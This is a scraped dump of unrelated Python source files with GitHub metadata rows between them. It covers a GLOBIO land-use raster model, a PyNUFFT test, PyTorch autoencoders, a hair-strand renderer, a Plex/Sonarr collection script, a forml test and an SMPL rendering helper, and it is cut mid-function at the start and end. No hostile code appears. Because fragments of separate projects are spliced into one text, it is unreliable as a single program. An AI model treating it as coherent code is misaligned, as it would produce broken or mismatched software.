infrastructure_nodata_list.append(
pygeoprocessing.geoprocessing.get_nodata_from_uri(
infrastructure_filenames[-1]))
if filename.lower().endswith(".shp"):
LOGGER.debug("shape added %s", filename)
infrastructure_tmp_raster = (
os.path.join(args['workspace_dir'], os.path.basename(filename.lower() + ".tif")))
pygeoprocessing.geoprocessing.new_raster_from_base_uri(
globio_lulc_uri, infrastructure_tmp_raster,
'GTiff', -1.0, gdal.GDT_Int32, fill_value=0)
pygeoprocessing.geoprocessing.rasterize_layer_uri(
infrastructure_tmp_raster,
os.path.join(root_directory, filename), burn_values=[1],
option_list=["ALL_TOUCHED=TRUE"])
infrastructure_filenames.append(infrastructure_tmp_raster)
infrastructure_nodata_list.append(
pygeoprocessing.geoprocessing.get_nodata_from_uri(
infrastructure_filenames[-1]))
if len(infrastructure_filenames) == 0:
raise ValueError(
"infrastructure directory didn't have any GeoTIFFS or "
"Shapefiles at %s", args['infrastructure_dir'])
infrastructure_nodata = -1
infrastructure_uri = os.path.join(
args['workspace_dir'], 'combined_infrastructure%s.tif' % file_suffix)
def collapse_infrastructure_op(*infrastructure_array_list):
"""Combines all input infrastructure into a single map where if any
pixel on the stack is 1 gets passed through, any nodata pixel
masks out all of them"""
nodata_mask = (
infrastructure_array_list[0] == infrastructure_nodata_list[0])
infrastructure_result = infrastructure_array_list[0] > 0
for index in range(1, len(infrastructure_array_list)):
current_nodata = (
infrastructure_array_list[index] ==
infrastructure_nodata_list[index])
infrastructure_result = (
infrastructure_result |
((infrastructure_array_list[index] > 0) & ~current_nodata))
nodata_mask = (
nodata_mask & current_nodata)
return numpy.where(
nodata_mask, infrastructure_nodata, infrastructure_result)
LOGGER.info('collapse infrastructure into one raster')
pygeoprocessing.geoprocessing.vectorize_datasets(
infrastructure_filenames, collapse_infrastructure_op,
infrastructure_uri, gdal.GDT_Byte, infrastructure_nodata,
out_pixel_size, "intersection", dataset_to_align_index=0,
assert_datasets_projected=False, vectorize_op=False)
#calc_msa_f
primary_veg_mask_uri = os.path.join(
args['workspace_dir'], 'primary_veg_mask%s.tif' % file_suffix)
primary_veg_mask_nodata = -1
def primary_veg_mask_op(lulc_array):
"""masking out natural areas"""
nodata_mask = lulc_array == globio_nodata
result = (lulc_array == 1)
return numpy.where(nodata_mask, primary_veg_mask_nodata, result)
LOGGER.info("create mask of primary veg areas")
pygeoprocessing.geoprocessing.vectorize_datasets(
[globio_lulc_uri], primary_veg_mask_op,
primary_veg_mask_uri, gdal.GDT_Int32, primary_veg_mask_nodata,
out_pixel_size, "intersection", dataset_to_align_index=0,
assert_datasets_projected=False, vectorize_op=False)
LOGGER.info('gaussian filter primary veg')
sigma = 9.0
gaussian_kernel_uri = os.path.join(
args['workspace_dir'], 'gaussian_kernel%s.tif' % file_suffix)
make_gaussian_kernel_uri(sigma, gaussian_kernel_uri)
smoothed_primary_veg_mask_uri = os.path.join(
args['workspace_dir'], 'smoothed_primary_veg_mask%s.tif' % file_suffix)
pygeoprocessing.geoprocessing.convolve_2d_uri(
primary_veg_mask_uri, gaussian_kernel_uri, smoothed_primary_veg_mask_uri)
primary_veg_smooth_uri = os.path.join(
args['workspace_dir'], 'ffqi%s.tif' % file_suffix)
def primary_veg_smooth_op(primary_veg_mask_array, smoothed_primary_veg_mask):
"""mask out ffqi only where there's an ffqi"""
return numpy.where(
primary_veg_mask_array != primary_veg_mask_nodata,
primary_veg_mask_array * smoothed_primary_veg_mask,
primary_veg_mask_nodata)
LOGGER.info('calculate primary_veg_smooth')
pygeoprocessing.geoprocessing.vectorize_datasets(
[primary_veg_mask_uri, smoothed_primary_veg_mask_uri],
primary_veg_smooth_op, primary_veg_smooth_uri, gdal.GDT_Float32,
primary_veg_mask_nodata, out_pixel_size, "intersection",
dataset_to_align_index=0, assert_datasets_projected=False,
vectorize_op=False)
msa_nodata = -1
def msa_f_op(primary_veg_smooth):
"""calcualte msa fragmentation"""
nodata_mask = primary_veg_mask_nodata == primary_veg_smooth
msa_f = numpy.empty(primary_veg_smooth.shape)
msa_f[:] = 1.0
#These thresholds come from FFQI from Justin's code; I don't
#know where they otherwise came from.
msa_f[(primary_veg_smooth > .9825) & (primary_veg_smooth <= .9984)] = 0.95
msa_f[(primary_veg_smooth > .89771) & (primary_veg_smooth <= .9825)] = 0.90
msa_f[(primary_veg_smooth > .578512) & (primary_veg_smooth <= .89771)] = 0.7
msa_f[(primary_veg_smooth > .42877) & (primary_veg_smooth <= .578512)] = 0.6
msa_f[(primary_veg_smooth <= .42877)] = 0.3
msa_f[nodata_mask] = msa_nodata
return msa_f
LOGGER.info('calculate msa_f')
msa_f_uri = os.path.join(args['workspace_dir'], 'msa_f%s.tif' % file_suffix)
pygeoprocessing.geoprocessing.vectorize_datasets(
[primary_veg_smooth_uri], msa_f_op, msa_f_uri, gdal.GDT_Float32,
msa_nodata, out_pixel_size, "intersection", dataset_to_align_index=0,
assert_datasets_projected=False, vectorize_op=False)
#calc_msa_i
infrastructure_impact_zones = {
'no impact': 1.0,
'low impact': 0.9,
'medium impact': 0.8,
'high impact': 0.4
}
def msa_i_op(lulc_array, distance_to_infrastructure):
"""calculate msa infrastructure"""
msa_i_tropical_forest = numpy.empty(lulc_array.shape)
distance_to_infrastructure *= out_pixel_size #convert to meters
msa_i_tropical_forest[:] = infrastructure_impact_zones['no impact']
msa_i_tropical_forest[(distance_to_infrastructure > 4000.0) & (distance_to_infrastructure <= 14000.0)] = infrastructure_impact_zones['low impact']
msa_i_tropical_forest[(distance_to_infrastructure > 1000.0) & (distance_to_infrastructure <= 4000.0)] = infrastructure_impact_zones['medium impact']
msa_i_tropical_forest[(distance_to_infrastructure <= 1000.0)] = infrastructure_impact_zones['high impact']
msa_i_temperate_and_boreal_forest = numpy.empty(lulc_array.shape)
msa_i_temperate_and_boreal_forest[:] = infrastructure_impact_zones['no impact']
msa_i_temperate_and_boreal_forest[(distance_to_infrastructure > 1200.0) & (distance_to_infrastructure <= 4200.0)] = infrastructure_impact_zones['low impact']
msa_i_temperate_and_boreal_forest[(distance_to_infrastructure > 300.0) & (distance_to_infrastructure <= 1200.0)] = infrastructure_impact_zones['medium impact']
msa_i_temperate_and_boreal_forest[(distance_to_infrastructure <= 300.0)] = infrastructure_impact_zones['high impact']
msa_i_cropland_and_grassland = numpy.empty(lulc_array.shape)
msa_i_cropland_and_grassland[:] = infrastructure_impact_zones['no impact']
msa_i_cropland_and_grassland[(distance_to_infrastructure > 2000.0) & (distance_to_infrastructure <= 7000.0)] = infrastructure_impact_zones['low impact']
msa_i_cropland_and_grassland[(distance_to_infrastructure > 500.0) & (distance_to_infrastructure <= 2000.0)] = infrastructure_impact_zones['medium impact']
msa_i_cropland_and_grassland[(distance_to_infrastructure <= 500.0)] = infrastructure_impact_zones['high impact']
msa_i = numpy.where((lulc_array >= 1) & (lulc_array <= 5), msa_i_temperate_and_boreal_forest, infrastructure_impact_zones['no impact'])
msa_i = numpy.where((lulc_array >= 6) & (lulc_array <= 12), msa_i_cropland_and_grassland, msa_i)
return msa_i
LOGGER.info('calculate msa_i')
distance_to_infrastructure_uri = os.path.join(
args['workspace_dir'], 'distance_to_infrastructure%s.tif' % file_suffix)
pygeoprocessing.geoprocessing.distance_transform_edt(
infrastructure_uri, distance_to_infrastructure_uri)
msa_i_uri = os.path.join(args['workspace_dir'], 'msa_i%s.tif' % file_suffix)
pygeoprocessing.geoprocessing.vectorize_datasets(
[globio_lulc_uri, distance_to_infrastructure_uri], msa_i_op, msa_i_uri,
gdal.GDT_Float32, msa_nodata, out_pixel_size, "intersection",
dataset_to_align_index=0, assert_datasets_projected=False,
vectorize_op=False)
#calc_msa_lu
lu_msa_lookup = {
0.0: 0.0, #map 0 to 0
1.0: 1.0, #primary veg
2.0: 0.7, #lightly used natural forest
3.0: 0.5, #secondary forest
4.0: 0.2, #forest plantation
5.0: 0.7, #livestock grazing
6.0: 0.1, #man-made pastures
7.0: 0.5, #agroforesty
8.0: 0.3, #low-input agriculture
9.0: 0.1, #intenstive agriculture
10.0: 0.05, #built-up areas
}
msa_lu_uri = os.path.join(
args['workspace_dir'], 'msa_lu%s.tif' % file_suffix)
LOGGER.info('calculate msa_lu')
pygeoprocessing.geoprocessing.reclassify_dataset_uri(
globio_lulc_uri, lu_msa_lookup, msa_lu_uri,
gdal.GDT_Float32, globio_nodata, exception_flag='values_required')
LOGGER.info('calculate msa')
msa_uri = os.path.join(
args['workspace_dir'], 'msa%s.tif' % file_suffix)
def msa_op(msa_f, msa_lu, msa_i):
return numpy.where(
msa_f != globio_nodata, msa_f* msa_lu * msa_i, globio_nodata)
pygeoprocessing.geoprocessing.vectorize_datasets(
[msa_f_uri, msa_lu_uri, msa_i_uri], msa_op, msa_uri,
gdal.GDT_Float32, msa_nodata, out_pixel_size, "intersection",
dataset_to_align_index=0, assert_datasets_projected=False,
vectorize_op=False)
#calc msa msa = msa_f[tail_type] * msa_lu[tail_type] * msa_i[tail_type]
def make_gaussian_kernel_uri(sigma, kernel_uri):
"""create a gaussian kernel raster"""
max_distance = sigma * 5
kernel_size = int(numpy.round(max_distance * 2 + 1))
driver = gdal.GetDriverByName('GTiff')
kernel_dataset = driver.Create(
kernel_uri.encode('utf-8'), kernel_size, kernel_size, 1,
gdal.GDT_Float32, options=['BIGTIFF=IF_SAFER'])
#Make some kind of geotransform, it doesn't matter what but
#will make GIS libraries behave better if it's all defined
kernel_dataset.SetGeoTransform([444720, 30, 0, 3751320, 0, -30])
srs = osr.SpatialReference()
srs.SetUTM(11, 1)
srs.SetWellKnownGeogCS('NAD27')
kernel_dataset.SetProjection(srs.ExportToWkt())
kernel_band = kernel_dataset.GetRasterBand(1)
kernel_band.SetNoDataValue(-9999)
col_index = numpy.array(xrange(kernel_size))
integration = 0.0
for row_index in xrange(kernel_size):
kernel = numpy.exp(
-((row_index - max_distance)**2 +
(col_index - max_distance) ** 2)/(2.0*sigma**2)).reshape(
1, kernel_size)
integration += numpy.sum(kernel)
kernel_band.WriteArray(kernel, xoff=0, yoff=row_index)
for row_index in xrange(kernel_size):
kernel_row = kernel_band.ReadAsArray(
xoff=0, yoff=row_index, win_xsize=kernel_size, win_ysize=1)
kernel_row /= integration
kernel_band.WriteArray(kernel_row, 0, row_index)
| natcap/invest-natcap.invest-3 | invest_natcap/globio/globio.py | globio.py | py | 23,365 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.basicConfig",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "logging.getLogger",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "pygeoprocess... |
74157719464 | from torch import nn
class AE_Deconv(nn.Module):
def __init__(self, input_dim: int = 63, latent_dim: int = 16):
super().__init__()
assert latent_dim < 32
self.encoder = nn.Sequential(
nn.Linear(input_dim, 32),
nn.BatchNorm1d(32),
nn.ReLU(True),
nn.Linear(32, latent_dim),
nn.BatchNorm1d(latent_dim),
nn.ReLU(True),
# nn.Dropout2d(p=0.2),
)
self.projector = nn.Sequential(
nn.Linear(latent_dim, 32), nn.ReLU(True), nn.Linear(32, 64), nn.ReLU(True)
)
self.decoder = nn.Sequential(
nn.ConvTranspose2d(16, 8, kernel_size=(5, 6), stride=2), # C=8,H=11,W=19
nn.ReLU(),
nn.ConvTranspose2d(
8, 4, kernel_size=(3, 5), stride=2, output_padding=(0, 1)
),
nn.ReLU(),
nn.ConvTranspose2d(
4, 2, kernel_size=(3, 4), stride=2, output_padding=(0, 0)
),
nn.ReLU(),
nn.ConvTranspose2d(
2, 1, kernel_size=(3, 3), stride=2, output_padding=(1, 1)
),
)
def forward(self, x):
embedding = self.encoder(x)
z = self.projector(embedding)
z = z.view(z.size(0), 16, 2, -1) # Reshape to (bs, 16, 2, 2)
return self.decoder(z)
class AE(nn.Module):
def __init__(self, input_dim: int = 63, latent_dim: int = 16):
super().__init__()
assert latent_dim < 32
self.encoder = nn.Sequential(
nn.Linear(input_dim, 32),
# nn.BatchNorm1d(32),
nn.ReLU(True),
nn.Linear(32, latent_dim),
# nn.BatchNorm1d(latent_dim),
nn.ReLU(True),
# nn.Tanh(),
# nn.Dropout2d(p=0.2),
)
self.decoder = nn.Sequential(
nn.Linear(latent_dim, 32),
nn.ReLU(True),
nn.Linear(32, 64),
nn.ReLU(True),
nn.Linear(64, 128),
nn.ReLU(True),
nn.Linear(128, 512),
nn.ReLU(True),
nn.Linear(512, 1024),
nn.ReLU(True),
nn.Linear(1024, 2048),
nn.ReLU(True),
nn.Linear(2048, 6880),
)
def forward(self, x):
z = self.encoder(x)
y_hat = self.decoder(z)
return y_hat.view(y_hat.size(0), 1, 80, 86)
def encode(self, x):
return self.encoder(x)
| DanBigioi/Sign2Speech | src/models/components/autoencoder.py | autoencoder.py | py | 2,475 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 4,
"usage_type": "name"
},
{
"api_name": "torch.nn.Sequential",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_n... |
22349295595 | import sys
import os
from npbgpp.npbgplusplus.modeling.refiner.unet import RefinerUNet
from pytorch3d.io import load_obj, load_ply, save_obj
import cv2
import numpy as np
import pickle
import torch
import torch.nn as nn
import torch.nn.functional as F
import trimesh
import yaml
from .quad_rasterizer import QuadRasterizer
from NeuS.models.dataset import load_K_Rt_from_P
from src.utils.util import tensor2image
from src.utils.geometry import project_orient_to_camera, soft_interpolate, hard_interpolate
class Renderer(nn.Module):
def __init__(
self,
config,
device='cuda',
save_dir='strands_rasterizer'
):
super(Renderer, self).__init__()
self.image_size = config.get('image_size', 512)
self.out_channels = config.get('out_channels', -1)
self.logging_freq = config.get('logging_freq', 5000)
self.feat_size = config.get('feat_size', -1)
self.num_strands = config.get('num_strands', -1)
self.use_orients_cond = config.get('use_orients_cond', False)
self.use_silh = config.get('use_silh', False)
self.device = device
# Load head mesh for occlusion
if config.get('mesh_path', -1).split('.')[-1] == 'obj':
verts, faces, _ = load_obj(config.get('mesh_path', -1))
occlusion_faces = faces.verts_idx
else:
verts, faces = load_ply(config.get('mesh_path', -1))
occlusion_faces = faces
verts = verts.to(self.device)
occlusion_faces = occlusion_faces.to(self.device)
# Init rasterizers and renderers
self.rasterizer = QuadRasterizer(
render_size=self.image_size,
feats_dim=self.feat_size + self.use_silh,
head_mesh=(verts, occlusion_faces),
use_silh=self.use_silh,
use_orients_cond=self.use_orients_cond,
).to(self.device)
self.refiner_unet = RefinerUNet(
conv_block='gated',
num_input_channels=self.feat_size + 4 * self.use_orients_cond ,
feature_scale=4,
num_output_channels=self.out_channels
).to(self.device)
self.save_dir = os.path.join(save_dir, 'strands_rasterizers')
os.makedirs(self.save_dir, exist_ok=True)
def forward(self, strands_origins, z_app, raster_dict, iter):
rasterized = self.rasterizer(
strands_origins,
torch.cat((z_app, torch.ones(self.num_strands, 1).cuda()), dim=1),
raster_dict['cam_extr'],
raster_dict['cam_intr']
)
rasterized_features = rasterized[:, : self.feat_size, :, :]
raster_dict['rasterized_img'] = rasterized_features[0]
if self.use_orients_cond:
raster_idxs = rasterized[0, self.feat_size + 1:, :, :]
rasterized = rasterized[:, :self.feat_size + 1, :, :]
orients = torch.zeros_like(strands_origins)
orients[:, :orients.shape[1] - 1] = (strands_origins[:, 1:] - strands_origins[:, :-1])
orients[:, orients.shape[1] - 1: ] = orients[:, orients.shape[1] - 2: orients.shape[1] - 1]
orients = orients.reshape(-1, 3)
r = raster_idxs
r[r == 0] = -1
valid_pixels = r[r != -1]
strands_origins = soft_interpolate(valid_pixels.cuda(), strands_origins.view(-1, 3))
# Hard rasterize orientations
hard_orients = hard_interpolate(valid_pixels.cuda(), orients)
# Project orients and points from 3d to 2d with camera
projected_orients = project_orient_to_camera(hard_orients.unsqueeze(1), strands_origins, cam_intr=raster_dict['cam_intr'], cam_extr=raster_dict['cam_extr'])
plane_orients = torch.zeros(self.image_size, self.image_size, 1, device=hard_orients.device)
plane_orients[r[0]!=-1, :] = projected_orients
raster_dict['pred_orients'] = plane_orients.permute(2, 0, 1)
orient_cos_fine = plane_orients.cos()
orient_fine_cam = torch.cat(
[
orient_cos_fine * (orient_cos_fine >= 0),
plane_orients.sin(),
orient_cos_fine.abs() * (orient_cos_fine < 0)
],
dim=-1
)
raster_dict['visual_pred_orients'] = (orient_fine_cam.detach().cpu().numpy() * 255).clip(0, 255)
raster_dict['pred_silh'] = rasterized[0, self.feat_size:, :, :]
# Inpaint holes with unet
inp = [rasterized_features]
if self.use_orients_cond:
inp.append(plane_orients.permute(2, 0, 1)[None])
inp.append(orient_fine_cam.permute(2, 0, 1)[None])
inp = torch.cat(inp, dim=1)
rgb_hair_image = self.refiner_unet([inp]) #[1, 3, 512, 512]
raster_dict['pred_rgb'] = rgb_hair_image[0, :3]
return raster_dict
def calculate_losses(self, raster_dict, iter):
losses = {}
color_strands_error = (raster_dict['pred_rgb'] - raster_dict['gt_rgb']) * raster_dict['gt_silh']
losses['l1'] = F.l1_loss(
color_strands_error,
torch.zeros_like(color_strands_error), reduction='sum'
) / (raster_dict['gt_silh'].sum() + 1e-5)
losses['silh'] = ((raster_dict['pred_silh'] - raster_dict['gt_silh']).abs()).mean()
if iter % self.logging_freq == 0:
self.visualize(raster_dict, iter)
return losses
def visualize(self, visuals, iter):
cv2.imwrite(os.path.join(self.save_dir, f'rasterize_{iter}_resol_512.png'), tensor2image(visuals['rasterized_img'][:3, :, :]))
cv2.imwrite(os.path.join(self.save_dir, f'pred_silh_{iter}_resol_512.png'), tensor2image(visuals['pred_silh'][:3, :, :]))
cv2.imwrite(os.path.join(self.save_dir, f'gt_silh_{iter}_resol_512.png'), tensor2image(visuals['gt_silh'][:3, :, :]))
cv2.imwrite(
os.path.join(self.save_dir, f'pred_hair_strands_{iter}.png'),
tensor2image(visuals['pred_rgb'][:3, :, :] * visuals['gt_silh'] + 1 - visuals['gt_silh'])
)
cv2.imwrite(
os.path.join(self.save_dir, f'gt_hair_strands_{iter}.png'),
tensor2image(visuals['gt_rgb'][:3, :, :] * visuals['gt_silh'] + 1 - visuals['gt_silh'])
)
if self.use_orients_cond or self.use_gabor_loss:
cv2.imwrite(os.path.join(self.save_dir, f'pred_hair_or_{iter}.png'), visuals['visual_pred_orients'])
cv2.imwrite(os.path.join(self.save_dir, f'gt_hair_or_{iter}.png'), visuals['visual_gt_orients'])
| SamsungLabs/NeuralHaircut | src/hair_networks/strands_renderer.py | strands_renderer.py | py | 6,865 | python | en | code | 453 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "pytorch3d.io.load_obj",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "pytorch3d.io.load... |
71919299305 | #!/usr/bin/python3
#-*- coding: utf-8 -*-
"""
The use case of this script is the following:
Put all movies (radarr) or series (sonarr) with a certain tag in a collection in plex
Requirements (python3 -m pip install [requirement]):
requests
Setup:
Fill the variables below firstly, then run the script with -h to see the arguments that you need to give.
"""
plex_ip = ''
plex_port = ''
plex_api_token = ''
#These need to be filled when you want to use the script with sonarr
sonarr_ip = ''
sonarr_port = ''
sonarr_api_token = ''
#These need to be filled when you want to use the script with radarr
radarr_ip = ''
radarr_port = ''
radarr_api_token = ''
from os import getenv
import requests
# Environmental Variables
plex_ip = getenv('plex_ip', plex_ip)
plex_port = getenv('plex_port', plex_port)
plex_api_token = getenv('plex_api_token', plex_api_token)
base_url = f'http://{plex_ip}:{plex_port}'
sonarr_ip = getenv('sonarr_ip', sonarr_ip)
sonarr_port = getenv('sonarr_port', sonarr_port)
sonarr_api_token = getenv('sonarr_api_token', sonarr_api_token)
radarr_ip = getenv('radarr_ip', radarr_ip)
radarr_port = getenv('radarr_port', radarr_port)
radarr_api_token = getenv('radarr_api_token', radarr_api_token)
def _find_in_plex(plex_ssn, path: str, sections: list):
#find library that file is in
for lib in sections:
for loc in lib['Location']:
if loc['path'] in path:
lib_id = lib['key']
content_type = '1' if lib['type'] == 'movie' else '4'
break
else:
continue
break
else:
return ''
#find file in library
lib_output = plex_ssn.get(f'{base_url}/library/sections/{lib_id}/all', params={'type': content_type}).json()['MediaContainer']['Metadata']
for entry in lib_output:
for media in entry['Media']:
for part in media['Part']:
if path in part['file']:
return entry['grandparentRatingKey']
return ''
def tag_to_collection(plex_ssn, source: str, tag_name: str, library_name: str, collection_name: str):
result_json = []
sections = plex_ssn.get(f'{base_url}/library/sections').json()['MediaContainer']['Directory']
for lib in sections:
if lib['title'] == library_name:
lib_id = lib['key']
break
else:
return 'Library not found'
if source == 'sonarr':
if sonarr_ip and sonarr_port and sonarr_api_token:
#apply script to sonarr
sonarr_base_url = f'http://{sonarr_ip}:{sonarr_port}/api/v3'
sonarr_ssn = requests.Session()
sonarr_ssn.params.update({'apikey': sonarr_api_token})
try:
series_list = sonarr_ssn.get(f'{sonarr_base_url}/series').json()
except requests.exceptions.ConnectionError:
return 'Can\'t connect to Sonarr'
#find id of tag
tags = sonarr_ssn.get(f'{sonarr_base_url}/tag').json()
for tag in tags:
if tag['label'] == tag_name:
tag_id = tag['id']
break
else:
return 'Tag not found'
#loop through all series in sonarr
for series in series_list:
if tag_id in series['tags']:
#series found with tag applied
result_json.append(_find_in_plex(plex_ssn=plex_ssn, path=series['path'], sections=sections))
#delete prev collection with name
#create collection
#add ratingkeys to result_json
else:
return 'Sonarr set as source but variables not set'
elif source == 'radarr':
if radarr_ip and radarr_port and radarr_api_token:
#apply script to sonarr
radarr_base_url = f'http://{radarr_ip}:{radarr_port}/api/v3'
radarr_ssn = requests.Session()
radarr_ssn.params.update({'apikey': radarr_api_token})
try:
movie_list = radarr_ssn.get(f'{radarr_base_url}/movie').json()
except requests.exceptions.ConnectionError:
return 'Can\'t connect to Radarr'
#find id of tag
tags = radarr_ssn.get(f'{radarr_base_url}/tag')
for tag in tags:
if tag['label'] == tag_name:
tag_id = tag['id']
break
else:
return 'Tag not found'
#loop through all movies in radarr
for movie in movie_list:
if tag_id in movie['tags']:
#series found with tag applied
result_json.append(_find_in_plex(plex_ssn=plex_ssn, path=movie.get('movieFile','').get('path',''), sections=sections))
else:
return 'Radarr set as source but variables not set'
#delete collection if it already exists
collections = plex_ssn.get(f'{base_url}/library/sections/{lib_id}/collections').json()['MediaContainer'].get('Metadata',[])
for collection in collections:
if collection['title'] == collection_name:
plex_ssn.delete(f'{base_url}/library/collections/{collection["ratingKey"]}')
#create collection
machine_id = plex_ssn.get(f'{base_url}/').json()['MediaContainer']['machineIdentifier']
plex_ssn.post(f'{base_url}/library/collections', params={'type': '1' if source == 'radarr' else '2', 'title': collection_name, 'smart': '0', 'sectionId': lib_id, 'uri': f'server://{machine_id}/com.plexapp.plugins.library/library/metadata/{",".join(result_json)}'})
return result_json
if __name__ == '__main__':
from requests import Session
from argparse import ArgumentParser
#setup vars
ssn = Session()
ssn.headers.update({'Accept': 'application/json'})
ssn.params.update({'X-Plex-Token': plex_api_token})
#setup arg parsing
parser = ArgumentParser(description="Put all movies (radarr) or series (sonarr) with a certain tag in a collection in plex")
parser.add_argument('-s', '--Source', type=str, choices=['sonarr','radarr'], help="Select the source which media files should be checked", required=True)
parser.add_argument('-t', '--TagName', type=str, help="Name of tag to search for", required=True)
parser.add_argument('-l', '--LibraryName', type=str, help="Name of the target library to put the collection in", required=True)
parser.add_argument('-c', '--CollectionName', type=str, help="Name of the collection", required=True)
args = parser.parse_args()
#call function and process result
response = tag_to_collection(plex_ssn=ssn, source=args.Source, tag_name=args.TagName, library_name=args.LibraryName, collection_name=args.CollectionName)
if not isinstance(response, list):
parser.error(response)
| Casvt/Plex-scripts | sonarr/tag_to_collection.py | tag_to_collection.py | py | 6,013 | python | en | code | 285 | github-code | 36 | [
{
"api_name": "os.getenv",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "os.getenv",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "os.getenv",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "os.getenv",
"line_number": 35,
... |
38093193093 | import typing
import pytest
from forml import project
from forml.io import dsl, layout
from forml.io._input import extract
class TestSlicer:
"""Slicer unit tests."""
@staticmethod
@pytest.fixture(scope='session')
def features(project_components: project.Components) -> typing.Sequence[dsl.Feature]:
"""Features components fixture."""
return project_components.source.extract.train.features
@staticmethod
@pytest.fixture(scope='session')
def labels(project_components: project.Components) -> dsl.Feature:
"""Labels components fixture."""
value = project_components.source.extract.labels
assert isinstance(value, dsl.Feature)
return value
@staticmethod
@pytest.fixture(scope='session')
def dataset(trainset: layout.RowMajor) -> layout.Tabular:
"""Dataset fixture."""
columns = layout.Dense.from_rows(trainset).to_columns()
return layout.Dense.from_columns([*columns, columns[-1]]) # duplicating the last column
@pytest.mark.parametrize(
'labels_factory, labels_width',
[
(lambda f: f, 1),
(lambda f: [f], 1),
(lambda f: [f, f], 2),
],
)
def test_slicer(
self,
labels_factory: typing.Callable[[dsl.Feature], typing.Union[dsl.Feature, typing.Sequence[dsl.Feature]]],
labels_width: int,
features: typing.Sequence[dsl.Feature],
labels: dsl.Feature,
dataset: layout.Tabular,
):
"""Slicing test."""
labels_fields = labels_factory(labels)
all_fields, slicer = extract.Slicer.from_columns(features, labels_fields)
assert len(all_fields) == len(features) + labels_width
assert len(slicer.args[0]) == len(features)
left, right = slicer().apply(dataset)
columns = dataset.to_columns()
assert len(left) == len(right) == len(columns[0])
assert len(left[0]) == len(features)
if isinstance(labels_fields, dsl.Feature):
assert right[0] == columns[-1][0]
else:
assert len(right[0]) == labels_width
| formlio/forml | tests/io/_input/test_extract.py | test_extract.py | py | 2,136 | python | en | code | 103 | github-code | 36 | [
{
"api_name": "forml.project.Components",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "forml.project",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "pytest.fixture",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "typing.Seq... |
30381880481 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Oct 30 09:32:26 2018
@author: jon
"""
import cmath
import math
import numpy as np
import matplotlib.pyplot as plt
from pynufft import NUFFT_cpu
def expectedIFT(img, X, u, v):
N = img.shape[0]//2
for x in range (-N, N):
for y in range(-N, N):
img[x-N, y-N] = img[x-N,y-N] + X * cmath.exp(-2j*math.pi * (u*x + v*y))
u0 = 0.05
v0 = 0.013
u1 = 0.0018
v1 = 0.046
img = np.zeros([32,32], dtype=np.complex128)
expectedIFT(img, 3, u0, v0)
expectedIFT(img, 2.5, u1, v1)
plt.imshow(np.real(img))
print(np.max(np.real(img)))
NufftObj = NUFFT_cpu()
Nd = (32, 32) # image size
Kd = (64, 64) # k-space size
Jd = (2, 2) # interpolation size
om = [
[u0, v0],
[u1,v1]]
NufftObj.plan(np.asarray(om), Nd, Kd, Jd)
img2 = NufftObj.adjoint([3, 2.5])
plt.imshow(np.real(img2))
print(np.max(np.real(img2)))
| lord-blueberry/p8-pipeline | sandbox/first_runs/pynufft/BUG.py | BUG.py | py | 915 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "cmath.exp",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "math.pi",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "numpy.zeros",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "numpy.complex128",
"line_numbe... |
28959351830 | from cfg import constants
import torch
import numpy as np
import trimesh
import pyrender
import cv2
import os
def render_smpl(vertices, faces, image, intrinsics, pose, transl,
alpha=1.0, filename='render_sample.png'):
img_size = image.shape[-2]
material = pyrender.MetallicRoughnessMaterial(
metallicFactor=0.2,
alphaMode='OPAQUE',
baseColorFactor=(0.8, 0.3, 0.3, 1.0))
# Generate SMPL vertices mesh
mesh = trimesh.Trimesh(vertices, faces)
# Default rotation of SMPL body model
rot = trimesh.transformations.rotation_matrix(np.radians(180), [1, 0, 0])
mesh.apply_transform(rot)
mesh = pyrender.Mesh.from_trimesh(mesh, material=material)
scene = pyrender.Scene(ambient_light=(0.5, 0.5, 0.5))
scene.add(mesh, 'mesh')
camera_pose = np.eye(4)
camera_pose[:3, :3] = pose
camera_pose[:3, 3] = transl
camera = pyrender.IntrinsicsCamera(fx=intrinsics[0, 0], fy=intrinsics[1, 1],
cx=intrinsics[0, 2], cy=intrinsics[1, 2])
scene.add(camera, pose=camera_pose)
# Light information
light = pyrender.DirectionalLight(color=[1.0, 1.0, 1.0], intensity=1)
light_pose = np.eye(4)
light_pose[:3, 3] = np.array([0, -1, 1])
scene.add(light, pose=light_pose)
light_pose[:3, 3] = np.array([0, 1, 1])
scene.add(light, pose=light_pose)
light_pose[:3, 3] = np.array([1, 1, 2])
scene.add(light, pose=light_pose)
renderer = pyrender.OffscreenRenderer(
viewport_width=img_size, viewport_height=img_size, point_size=1.0)
color, rend_depth = renderer.render(scene, flags=pyrender.RenderFlags.RGBA)
valid_mask = (rend_depth > 0)[:,:,None]
color = color.astype(np.float32) / 255.0
valid_mask = (rend_depth > 0)[:,:,None]
output_img = color[:, :, :3] * valid_mask + (1 - valid_mask) * image / 255.0
cv2.imwrite(filename, 255 * output_img)
def generate_figure(camera, pred_output, body_model, images, gt, iters, save_org=False):
from scipy.spatial.transform import Rotation as R
betas = pred_output.betas.clone()
body_pose = pred_output.body_pose.clone()
glob_ori = pred_output.global_orient.clone()
if body_pose.shape[-1] != 3:
body_pose = torch.from_numpy(R.from_rotvec(body_pose.cpu().detach().numpy().reshape(-1, 3)).as_matrix())[None].cuda().float()
